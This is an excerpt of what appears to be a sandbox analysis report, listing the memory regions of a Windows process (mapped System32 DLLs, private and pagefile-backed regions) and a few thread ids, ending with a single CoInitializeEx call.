filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll")
Region:
id = 1602
start_va = 0x7ff9f2040000
end_va = 0x7ff9f2078fff
monitored = 0
entry_point = 0x7ff9f2049c90
region_type = mapped_file
name = "aepic.dll"
filename = "\\Windows\\System32\\aepic.dll" (normalized: "c:\\windows\\system32\\aepic.dll")
Region:
id = 1603
start_va = 0x7ff9f2020000
end_va = 0x7ff9f2030fff
monitored = 0
entry_point = 0x7ff9f2023e10
region_type = mapped_file
name = "sfc_os.dll"
filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll")
Region:
id = 1604
start_va = 0x7ff9f3290000
end_va = 0x7ff9f3611fff
monitored = 0
entry_point = 0x7ff9f32e1220
region_type = mapped_file
name = "iertutil.dll"
filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll")
Region:
id = 1605
start_va = 0x7ff9f7980000
end_va = 0x7ff9f79b0fff
monitored = 0
entry_point = 0x7ff9f7987d10
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1606
start_va = 0x1e00000
end_va = 0x1efffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001e00000"
filename = ""
Region:
id = 1607
start_va = 0x780000
end_va = 0x7fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000780000"
filename = ""
Region:
id = 1608
start_va = 0x7ff9f1fe0000
end_va = 0x7ff9f200efff
monitored = 0
entry_point = 0x7ff9f1fe8910
region_type = mapped_file
name = "wptaskscheduler.dll"
filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll")
Region:
id = 1609
start_va = 0x7ff9f1fd0000
end_va = 0x7ff9f1fdcfff
monitored = 0
entry_point = 0x7ff9f1fd2ca0
region_type = mapped_file
name = "csystemeventsbrokerclient.dll"
filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll")
Region:
id = 1610
start_va = 0xe60000
end_va = 0xedffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000e60000"
filename = ""
Region:
id = 1611
start_va = 0x1f00000
end_va = 0x1ffffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001f00000"
filename = ""
Region:
id = 1612
start_va = 0x2000000
end_va = 0x20fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002000000"
filename = ""
Region:
id = 1613
start_va = 0x7ff9f1f10000
end_va = 0x7ff9f1fc0fff
monitored = 0
entry_point = 0x7ff9f1f888b0
region_type = mapped_file
name = "cellularapi.dll"
filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll")
Region:
id = 1614
start_va = 0x1170000
end_va = 0x11effff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001170000"
filename = ""
Region:
id = 1615
start_va = 0x7ff9f1ef0000
end_va = 0x7ff9f1f01fff
monitored = 0
entry_point = 0x7ff9f1ef9260
region_type = mapped_file
name = "rilproxy.dll"
filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll")
Region:
id = 1616
start_va = 0x7ff9f1e50000
end_va = 0x7ff9f1e65fff
monitored = 0
entry_point = 0x7ff9f1e51b60
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 1617
start_va = 0x7ff9f1df0000
end_va = 0x7ff9f1e44fff
monitored = 0
entry_point = 0x7ff9f1dffc00
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 1618
start_va = 0x7ff9f1dd0000
end_va = 0x7ff9f1de2fff
monitored = 0
entry_point = 0x7ff9f1dd57f0
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 1619
start_va = 0x7ff9f1d20000
end_va = 0x7ff9f1dcdfff
monitored = 0
entry_point = 0x7ff9f1d380c0
region_type = mapped_file
name = "windows.networking.connectivity.dll"
filename = "\\Windows\\System32\\Windows.Networking.Connectivity.dll" (normalized: "c:\\windows\\system32\\windows.networking.connectivity.dll")
Region:
id = 1620
start_va = 0x7ff9f1cf0000
end_va = 0x7ff9f1d1dfff
monitored = 0
entry_point = 0x7ff9f1cf7550
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 1621
start_va = 0x7ff9f7f70000
end_va = 0x7ff9f7f90fff
monitored = 0
entry_point = 0x7ff9f7f80250
region_type = mapped_file
name = "joinutil.dll"
filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll")
Region:
id = 1622
start_va = 0x7ff9f76d0000
end_va = 0x7ff9f7725fff
monitored = 0
entry_point = 0x7ff9f76e0bf0
region_type = mapped_file
name = "winsta.dll"
filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll")
Region:
id = 1623
start_va = 0x7ff9f78a0000
end_va = 0x7ff9f78abfff
monitored = 0
entry_point = 0x7ff9f78a27e0
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1624
start_va = 0x7ff9f1ca0000
end_va = 0x7ff9f1ce1fff
monitored = 0
entry_point = 0x7ff9f1ca27d0
region_type = mapped_file
name = "mstask.dll"
filename = "\\Windows\\System32\\mstask.dll" (normalized: "c:\\windows\\system32\\mstask.dll")
Region:
id = 1625
start_va = 0x550000
end_va = 0x551fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000550000"
filename = ""
Region:
id = 1626
start_va = 0x7ff9f7d60000
end_va = 0x7ff9f7dbbfff
monitored = 0
entry_point = 0x7ff9f7d76f70
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1627
start_va = 0x560000
end_va = 0x560fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000560000"
filename = ""
Region:
id = 1628
start_va = 0x2100000
end_va = 0x21fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002100000"
filename = ""
Region:
id = 1629
start_va = 0x7ff9f1c70000
end_va = 0x7ff9f1c86fff
monitored = 0
entry_point = 0x7ff9f1c75630
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 1630
start_va = 0x560000
end_va = 0x560fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000560000"
filename = ""
Region:
id = 1631
start_va = 0x7ff9f1c40000
end_va = 0x7ff9f1c66fff
monitored = 0
entry_point = 0x7ff9f1c43bf0
region_type = mapped_file
name = "profsvcext.dll"
filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll")
Region:
id = 1632
start_va = 0x7ff9f9e80000
end_va = 0x7ff9f9edbfff
monitored = 0
entry_point = 0x7ff9f9e9b720
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 1633
start_va = 0x7ff9f1c00000
end_va = 0x7ff9f1c3dfff
monitored = 0
entry_point = 0x7ff9f1c0a050
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 1634
start_va = 0x570000
end_va = 0x570fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000570000"
filename = ""
Region:
id = 1635
start_va = 0x7ff9f7430000
end_va = 0x7ff9f7453fff
monitored = 0
entry_point = 0x7ff9f7433260
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1636
start_va = 0x2200000
end_va = 0x22fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002200000"
filename = ""
Region:
id = 1637
start_va = 0x7ff9f1b00000
end_va = 0x7ff9f1be5fff
monitored = 0
entry_point = 0x7ff9f1b1cf10
region_type = mapped_file
name = "usermgr.dll"
filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll")
Region:
id = 1638
start_va = 0x7ff9f3620000
end_va = 0x7ff9f3755fff
monitored = 0
entry_point = 0x7ff9f364f350
region_type = mapped_file
name = "wintypes.dll"
filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll")
Region:
id = 1639
start_va = 0x7ff9f6b70000
end_va = 0x7ff9f6b82fff
monitored = 0
entry_point = 0x7ff9f6b72760
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1640
start_va = 0x2300000
end_va = 0x23fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002300000"
filename = ""
Region:
id = 1641
start_va = 0x590000
end_va = 0x590fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 1642
start_va = 0x590000
end_va = 0x590fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000590000"
filename = ""
Region:
id = 1643
start_va = 0x7ff9f18a0000
end_va = 0x7ff9f18e0fff
monitored = 0
entry_point = 0x7ff9f18a4840
region_type = mapped_file
name = "usermgrproxy.dll"
filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll")
Region:
id = 1647
start_va = 0x7ff9f6060000
end_va = 0x7ff9f6067fff
monitored = 0
entry_point = 0x7ff9f60613e0
region_type = mapped_file
name = "dabapi.dll"
filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll")
Region:
id = 1648
start_va = 0x7ff9f6b10000
end_va = 0x7ff9f6b2bfff
monitored = 0
entry_point = 0x7ff9f6b137a0
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 1649
start_va = 0x590000
end_va = 0x59cfff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "gpsvc.dll.mui"
filename = "\\Windows\\System32\\en-US\\gpsvc.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\gpsvc.dll.mui")
Region:
id = 1650
start_va = 0x1b40000
end_va = 0x1bbffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001b40000"
filename = ""
Region:
id = 1651
start_va = 0x7ff9f15c0000
end_va = 0x7ff9f15cbfff
monitored = 0
entry_point = 0x7ff9f15c2830
region_type = mapped_file
name = "bi.dll"
filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll")
Region:
id = 1652
start_va = 0x2400000
end_va = 0x25fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002400000"
filename = ""
Region:
id = 1653
start_va = 0x2400000
end_va = 0x24fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002400000"
filename = ""
Region:
id = 1654
start_va = 0x1d00000
end_va = 0x1dfffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000001d00000"
filename = ""
Region:
id = 1655
start_va = 0x7ff9f1350000
end_va = 0x7ff9f13e9fff
monitored = 0
entry_point = 0x7ff9f136ada0
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 1656
start_va = 0x7ff9f1290000
end_va = 0x7ff9f134ffff
monitored = 0
entry_point = 0x7ff9f12bfd20
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 1657
start_va = 0x5a0000
end_va = 0x5a0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000005a0000"
filename = ""
Region:
id = 1658
start_va = 0x7ff9f1230000
end_va = 0x7ff9f1281fff
monitored = 0
entry_point = 0x7ff9f12338e0
region_type = mapped_file
name = "proximityservice.dll"
filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll")
Region:
id = 1659
start_va = 0x7ff9f2010000
end_va = 0x7ff9f2073fff
monitored = 0
entry_point = 0x7ff9f2025ae0
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1660
start_va = 0x7ff9f1200000
end_va = 0x7ff9f122cfff
monitored = 0
entry_point = 0x7ff9f1202290
region_type = mapped_file
name = "proximitycommon.dll"
filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll")
Region:
id = 1661
start_va = 0x7ff9f11f0000
end_va = 0x7ff9f11f8fff
monitored = 0
entry_point = 0x7ff9f11f1ed0
region_type = mapped_file
name = "proximitycommonpal.dll"
filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll")
Region:
id = 1662
start_va = 0x7ff9f1800000
end_va = 0x7ff9f1837fff
monitored = 0
entry_point = 0x7ff9f1818cc0
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1663
start_va = 0x7ff9f11e0000
end_va = 0x7ff9f11effff
monitored = 0
entry_point = 0x7ff9f11e1700
region_type = mapped_file
name = "proximityservicepal.dll"
filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll")
Region:
id = 1664
start_va = 0x7ff9f8570000
end_va = 0x7ff9f85f5fff
monitored = 0
entry_point = 0x7ff9f857d8f0
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 1665
start_va = 0x7ff9f71b0000
end_va = 0x7ff9f71e1fff
monitored = 0
entry_point = 0x7ff9f71c2340
region_type = mapped_file
name = "fwbase.dll"
filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll")
Region:
id = 1666
start_va = 0x7ff9f7420000
end_va = 0x7ff9f742bfff
monitored = 0
entry_point = 0x7ff9f7422790
region_type = mapped_file
name = "hid.dll"
filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll")
Region:
id = 1667
start_va = 0x2100000
end_va = 0x21fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002100000"
filename = ""
Region:
id = 1668
start_va = 0x7ff9f1060000
end_va = 0x7ff9f106dfff
monitored = 0
entry_point = 0x7ff9f1061460
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1762
start_va = 0x7ff9f7f30000
end_va = 0x7ff9f7f3afff
monitored = 0
entry_point = 0x7ff9f7f319a0
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1779
start_va = 0x7ff9f6980000
end_va = 0x7ff9f6b05fff
monitored = 0
entry_point = 0x7ff9f69cd700
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1783
start_va = 0x5a0000
end_va = 0x5a3fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1784
start_va = 0x5b0000
end_va = 0x5f4fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000c.db")
Region:
id = 1785
start_va = 0x810000
end_va = 0x813fff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 1786
start_va = 0x2500000
end_va = 0x258dfff
monitored = 1
entry_point = 0x0
region_type = mapped_file
name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db")
Region:
id = 1787
start_va = 0x8b0000
end_va = 0x8c0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "propsys.dll.mui"
filename = "\\Windows\\System32\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\propsys.dll.mui")
Region:
id = 1797
start_va = 0x2590000
end_va = 0x278ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002590000"
filename = ""
Region:
id = 1798
start_va = 0x2600000
end_va = 0x26fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002600000"
filename = ""
Region:
id = 1843
start_va = 0x2700000
end_va = 0x277ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002700000"
filename = ""
Region:
id = 1906
start_va = 0x7ff9f1c90000
end_va = 0x7ff9f1c9ffff
monitored = 0
entry_point = 0x7ff9f1c92c60
region_type = mapped_file
name = "usermgrcli.dll"
filename = "\\Windows\\System32\\usermgrcli.dll" (normalized: "c:\\windows\\system32\\usermgrcli.dll")
Region:
id = 1965
start_va = 0x2780000
end_va = 0x287ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002780000"
filename = ""
Region:
id = 1967
start_va = 0x2880000
end_va = 0x297ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002880000"
filename = ""
Region:
id = 1968
start_va = 0x7ff9f08c0000
end_va = 0x7ff9f08fbfff
monitored = 0
entry_point = 0x7ff9f08c6aa0
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 1969
start_va = 0x7ff9f0840000
end_va = 0x7ff9f08befff
monitored = 0
entry_point = 0x7ff9f0857110
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 1973
start_va = 0x7ff9f0760000
end_va = 0x7ff9f07abfff
monitored = 0
entry_point = 0x7ff9f0775310
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 1974
start_va = 0x7ff9f9ba0000
end_va = 0x7ff9f9ba7fff
monitored = 0
entry_point = 0x7ff9f9ba1ea0
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 1975
start_va = 0x7ff9f1840000
end_va = 0x7ff9f184afff
monitored = 0
entry_point = 0x7ff9f1841d30
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1978
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netmsg.dll"
filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll")
Region:
id = 1979
start_va = 0x1100000
end_va = 0x1131fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "netmsg.dll.mui"
filename = "\\Windows\\System32\\en-US\\netmsg.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\netmsg.dll.mui")
Region:
id = 2015
start_va = 0x2980000
end_va = 0x2a7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002980000"
filename = ""
Region:
id = 2016
start_va = 0x2a80000
end_va = 0x2b7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002a80000"
filename = ""
Region:
id = 2017
start_va = 0x7ff9f0400000
end_va = 0x7ff9f04f2fff
monitored = 0
entry_point = 0x7ff9f0425d80
region_type = mapped_file
name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 2018
start_va = 0x7ff9f1420000
end_va = 0x7ff9f1486fff
monitored = 0
entry_point = 0x7ff9f14263e0
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 2021
start_va = 0x7ff9f02d0000
end_va = 0x7ff9f02e3fff
monitored = 0
entry_point = 0x7ff9f02d2d50
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 2024
start_va = 0x7ff9f9580000
end_va = 0x7ff9f99a8fff
monitored = 0
entry_point = 0x7ff9f95a8740
region_type = mapped_file
name = "setupapi.dll"
filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll")
Region:
id = 2025
start_va = 0x7ff9f0280000
end_va = 0x7ff9f02c0fff
monitored = 0
entry_point = 0x7ff9f0283750
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 2028
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2029
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2030
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2031
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2032
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2033
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2034
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2035
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2036
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2037
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2038
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2039
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2040
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2041
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2042
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2043
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2044
start_va = 0x8d0000
end_va = 0x8d0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000008d0000"
filename = ""
Region:
id = 2045
start_va = 0x7ff9f0260000
end_va = 0x7ff9f0270fff
monitored = 0
entry_point = 0x7ff9f0261d30
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 2049
start_va = 0x7ff9f0250000
end_va = 0x7ff9f0258fff
monitored = 0
entry_point = 0x7ff9f02518f0
region_type = mapped_file
name = "sscoreext.dll"
filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll")
Region:
id = 2050
start_va = 0x7ff9f0230000
end_va = 0x7ff9f024ffff
monitored = 0
entry_point = 0x7ff9f0231f50
region_type = mapped_file
name = "mi.dll"
filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll")
Region:
id = 2053
start_va = 0x7ff9f01d0000
end_va = 0x7ff9f022dfff
monitored = 0
entry_point = 0x7ff9f01d5080
region_type = mapped_file
name = "miutils.dll"
filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll")
Region:
id = 2054
start_va = 0x7ff9f01a0000
end_va = 0x7ff9f01cdfff
monitored = 1
entry_point = 0x7ff9f01a2300
region_type = mapped_file
name = "wmidcom.dll"
filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll")
Region:
id = 2057
start_va = 0x7ff9f7ae0000
end_va = 0x7ff9f7ae9fff
monitored = 0
entry_point = 0x7ff9f7ae1830
region_type = mapped_file
name = "dpapi.dll"
filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll")
Region:
id = 2060
start_va = 0x2b80000
end_va = 0x2c7ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000002b80000"
filename = ""
Region:
id = 2061
start_va = 0x7ff9f0140000
end_va = 0x7ff9f0191fff
monitored = 0
entry_point = 0x7ff9f0145770
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 2064
start_va = 0x7ff9f0090000
end_va = 0x7ff9f0132fff
monitored = 0
entry_point = 0x7ff9f0092c10
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 2065
start_va = 0x7ff9f8000000
end_va = 0x7ff9f8026fff
monitored = 0
entry_point = 0x7ff9f8010aa0
region_type = mapped_file
name = "ncrypt.dll"
filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll")
Region:
id = 2066
start_va = 0x7ff9f7fc0000
end_va = 0x7ff9f7ff9fff
monitored = 0
entry_point = 0x7ff9f7fc8d20
region_type = mapped_file
name = "ntasn1.dll"
filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll")
Region:
id = 2071
start_va = 0x7ff9f0060000
end_va = 0x7ff9f0084fff
monitored = 0
entry_point = 0x7ff9f0065ca0
region_type = mapped_file
name = "httpprxm.dll"
filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll")
Region:
id = 2072
start_va = 0x7ff9f0040000
end_va = 0x7ff9f0057fff
monitored = 0
entry_point = 0x7ff9f0044e10
region_type = mapped_file
name = "adhsvc.dll"
filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll")
Thread:
id = 112
os_tid = 0x3e8
Thread:
id = 113
os_tid = 0x3ec
Thread:
id = 114
os_tid = 0x14c
Thread:
id = 115
os_tid = 0x148
Thread:
id = 116
os_tid = 0x154
Thread:
id = 117
os_tid = 0x158
Thread:
id = 118
os_tid = 0x18c
[0321.067] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
